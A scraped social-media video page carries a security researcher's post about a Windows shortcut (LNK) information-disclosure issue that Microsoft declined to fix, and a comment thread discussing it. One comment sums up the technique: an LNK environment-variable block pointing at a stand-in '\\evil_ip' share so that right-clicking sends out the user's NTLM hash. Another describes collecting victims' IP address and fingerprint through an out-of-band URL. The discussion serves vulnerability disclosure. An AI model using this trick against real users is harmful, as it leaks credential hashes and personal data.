Загрузка видео...
Не удалось загрузить видео
A quick writeup on potential security issue of Windows LNK that I reported to MSRC last month. They decided to not fix due to relying on MOTW. In the blog I included the proof of concept. All you have to do is to Right-Click and get Info Disclosure :)
25,240 просмотров • 1 год назад •via X (Twitter)
Комментарии: 11

Nice seeing actual dig into details of .LNK structure! tag/TLDR: lnk.header.flags |= HAS_EXP_STRING; 🤭 lnk.envarBlock := "\\evil_ip\gibe_hash" then right-click to sendout the ntlm hash

Thanks 🫡

"My friends think I'm a crypto genius, (I'm not) it's because I read WAGMI’s weekly newsletter (and they have no idea it exists)" - Every Crypto Degen

I did something similar but I passed an http oob url and used it to collect their ip address, geolocation, and finger print info This is significantly more severe and I am honestly shocked they decided not to fix it

That sounds awesome! Have you write or publish anything about the stuff you work on? Yeah too bad they didn’t treat this as security issue since MOTW did the protection, according to them :-)

Open since June 24

The description looks similar however in your advisory seems to tie with CVE-2024-43451. How come this still not fix for the Right-Click? Any thoughts?

TAG: PoC

What's the app you use for function tracing?

I’m using Rohitab API Monitor

@BriPwn
